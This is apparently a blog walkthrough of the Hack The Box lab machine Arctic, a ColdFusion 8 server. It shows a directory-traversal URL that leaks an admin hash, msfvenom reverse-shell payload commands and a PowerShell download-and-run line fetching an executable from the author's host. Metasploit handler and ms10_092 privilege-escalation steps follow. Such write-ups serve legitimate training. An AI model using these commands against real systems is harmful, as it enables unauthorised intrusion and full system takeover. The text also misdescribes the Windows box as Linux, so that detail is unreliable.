Arctic Writeup

Arctic Writeup / Walkthrough Hack the box

TL;DR

This is a writeup on Arctic which is a Linux box categorized as easy on HackTheBox, and has Adobe’s ColdFusion as a primary service running on it. The exploitation essentially leverages enumeration and CVEs, namely Adobe ColdFusion – Directory Traversal & MS10_092. Interestingly, it does require us to escalate the user privileges for obtaining the root flag.

Walkthrough

Before, we start, I want to let you know that this particular box Arctic on HackTheBox has got some serious latency issue. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, thus as a result you might notice different IP addresses for the box in the included screenshots and commands.

Arctic Writeup: Scanning Network

Let’s start off by running an obvious nmap scan.

# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45
Nmap scan report for 10.129.150.85
 Host is up (0.16s latency).
 Not shown: 997 filtered ports
 PORT      STATE SERVICE VERSION

 135/tcp   open  msrpc   Microsoft Windows RPC

 8500/tcp  open  fmtp?

 49154/tcp open  msrpc   Microsoft Windows RPC

 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: general purpose|phone|specialized
 Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)

 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=262 (Good luck!)
 IP ID Sequence Generation: Incremental
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So, the scan has returned with 3 open ports 135, 8500, 49154. Among which, the 135 & 49154 are running basic RPC service. Let’s first explore port 8500 as it seems interesting.

Arctic Writeup: Enumeration

Starting off with the browser view of port 8500.

Arctic Writeup: Port 8500 browser view
Port 8500 browser view

We find two directories, namely CFIDE & cfdocs. Enumerating further with CFIDE/

Port 8500 /CFIDE/

We have a plenty of files and directories in here. But, administrator sounds worthy enough to be explored first πŸ˜‰

Port 8500 /CFIDE/administrator

Okay, so we have a login page of “ColdFusion 8” running here, with the username locked to admin.
You can check out this link to learn more about Adobe’s ColdFusion.

I also googled about the changelog for ColdFusion 8 and found out that there was only a single sub-version of version 8 i.e. “ColdFusion v8.0.1“. Thus, we can be sure that we are dealing with ColdFusion v8.0.1 here. It’s always wise to do version enumeration, you never know where it may help you out πŸ˜‰

I did try a few default passwords like “admin“, “password“, etc. but no luck with them. And I couldn’t afford to brute-fore my way in because this box took freaking 30 seconds to respond to every request.

Arctic Writeup: Exploitation

So, better search for some exploits available for ColdFusion 8

I found this Directory Traversal exploit on ExploitDB

Arctic Writeup: ColdFusion Directory Traversal exploit
ColdFusion Directory Traversal exploit

Arctic Writeup: Using the Directory Traversal Exploit

Modifying the URL (as per the instructions in the exploit) –

http://10.129.150.104:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Result for Directory Traversal Exploit

The exploit did work and reveals a password hash

Password Hash--> 
 password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Analyzing the password hash

Using a hash identifier website I found out that the hash type is SHA1

Arctic Writeup: Identifying the has type
Identifying the has type

Further trying a few websites for SHA1 hash decryption I was able to decrypt the password hash using this site

Decrypted password hash
password = happyday
Arctic Writeup: Administrator account ColdFusion
Administrator account ColdFusion

Great! Now, after trying the password obtained, we were logged in as “Administrator“.

Arctic Writeup: Getting a reverse shell

There are a hell lot of things to do here but what’s of use to us is the “Scheduling Tasks” service under the “Debugging & Logging” section, which ColdFusion offers and allows us to upload files.

I will be creating a reverse shell in jsp using msfvenom, to upload.
Why jsp?
It’s because after I took a lil hint from the walkthroughs, I learn that ColdFusion serves and runs jsp files.

Creating a jsp reverse shell using msfvenom (fit in the LHOST and LPORT values) –>

β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp
 Payload size: 1500 bytes

Let’s copy this reverse shell file into our apache web server directory i.e. /var/www/html/

β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ cp shell.jsp /var/www/html/

and start the apache server on our machine.

β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ service apache2 start

Checking the localhost webpage to ensure that we have the file “shell.jsp” hosted.

Arctic Writeup: shell.jsp hosted on localhost
shell.jsp hosted on localhost

Now, let’s schedule a task in ColdFusion to visit this "shell.jsp” file on our server and do the magic πŸ˜‰
I will add the URL of our server where the “shell.jsp” file resides i.e. http://10.10.14.52/shell.jsp and will also specify the destination path to save the file on the box i.e. C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Scheduling a task on ColdFusion

Once, the task is scheduled, Run it !

Run the scheduled task

It will take a while, and then give a message “This scheduled task was completed successfully.

Verifying that we have successfully uploaded “shell.jsp” to the CFIDE directory.

Arctic Writeup: shell.jsp uploaded on the box
shell.jsp uploaded on the box

So, yes shell.jsp is successfully uploaded.

let’s open up the listening port 8500 on our machine (as 8500 was the port we mentioned as LPORT in the shell.jsp)

β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ nc -nlvp 8500
 listening on [any] 8500 …

Let’s now visit the URL to "shell.jsp” file on the box http://10.129.150.104:8500/CFIDE/shell.jsp
Yay! We have a reverse shell!

Arctic Writeup: reverse shell
reverse shell

Arctic Writeup: User Flag

On running the command “whoami” we find out that the current user is “tolis

Arctic Writeup: User Flag
User flag

VoilaπŸŽ‰ We have the user flag. Now we gotta escalate our privileges.

Arctic Writeup: Root Flag

Getting a reverse meterpreter shell

Now, because this is just a reverse shell, let us try getting a meterpreter session on the box
Let’s create a windows reverse meterpreter shell using msfvenom β€”>

β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
 [-] No arch selected, selecting arch: x86 from the payload
 No encoder or badchars specified, outputting raw payload
 Payload size: 341 bytes
 Final size of exe file: 73802 bytes

And copy it to the server directory to be able to host this file on the server.

 β”Œβ”€[[email protected]]─[~/Desktop/Arctic HTB]
 └──╼ cp met_shell.exe /var/www/html/

now let’s run this powershell command in the normal reverse shell we obtainer earlier,

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"

So, now we have the “meterpreter.exe” on the box

uploaded meterpreter.exe on the box

Let’s use the “exploit/multi/handler" on metasploit

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target

 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp

 msf5 exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target

 msf5 exploit(multi/handler) > set LHOST 10.10.14.52
 LHOST => 10.10.14.52
 msf5 exploit(multi/handler) > set LPORT 8500
 LPORT => 8500

 msf5 exploit(multi/handler) > run
 [*] Started reverse TCP handler on 10.10.14.52:8500 

Now let’s run the “meterpreter.exe” file on the box using our current shell.

running meterpreter.exe on the box

And there we have our reverse meterpreter shell πŸ™‚

reverse meterpreter shell

PSWe are running a x86 meterpreter session on a x64 box.

I also tried out the command “getsystem” to gain root, you know just in case πŸ˜‰ but it didn’t work lol

Trying to get AUTHORITY access using getsystem

Now, lets run the “local_exploit_suggester". This module basically suggests any exploits that the box is vulnerable against.

meterpreter > 
 Background session 1? [y/N]  
 msf5 exploit(multi/handler) > search suggest
 Matching Modules
 #  Name                                             Disclosure Date  Rank    Check  Description
 ----                                             ---------------  ----    -----  -----------
 0  auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
 1  exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
 2  exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow
 3  post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
 4  post/osx/gather/enum_colloquy                                     normal  No     OS X Gather Colloquy Enumeration
 5  post/osx/manage/sonic_pi                                          normal  No     OS X Manage Sonic Pi 
 msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
 msf5 post(multi/recon/local_exploit_suggester) > show options
 Module options (post/multi/recon/local_exploit_suggester):
 Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
    SESSION                           yes       The session to run this module on
    SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
 msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
 SESSION => 1
 msf5 post(multi/recon/local_exploit_suggester) > run

OK so we have some interesting results,

x86 results from local_exploit_suggester

Also, because we are running an x86 architecture meterpreter session on an x64 architecture box, we should additionally try to migrate our meterpreter session to an x64 architecture and re-run the “local_exploit_suggester” module as they may return different results.

Arctic Writeup: Migrating meterpreter shell

So, lets migrate our x86 meterpreter session into an x64 version.

checking running processes
checking the running processes to migrate to

Let’s choose a process with x64 Architecture,
I will be avoiding “powershell.exe” because using it may cause this process to die, and if “powershell.exe" dies our meterpreter session dies.
Let’s use “jrun.exe" with “pid = 1140

So. now we have successfully migrated into an x64 version meterpreter session. Lets re-run the “local_exploit_suggester"

x64 results from local_exploit_suggester

Comparing the two results from x86 session and x64 session, we can deduce that “exlpoit/windows/local/ms10_092_scelevator” which is ideal for escalating privileges is common to both. Let’s try the exploit “ms10_092

windows/local/ms10_092_schelevator

Awesome! πŸ₯³ We are AUTHORITY\SYSTEM . Here’s the root flag.

Until next box, checkout other intriguing writeups here

Posts created 2

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top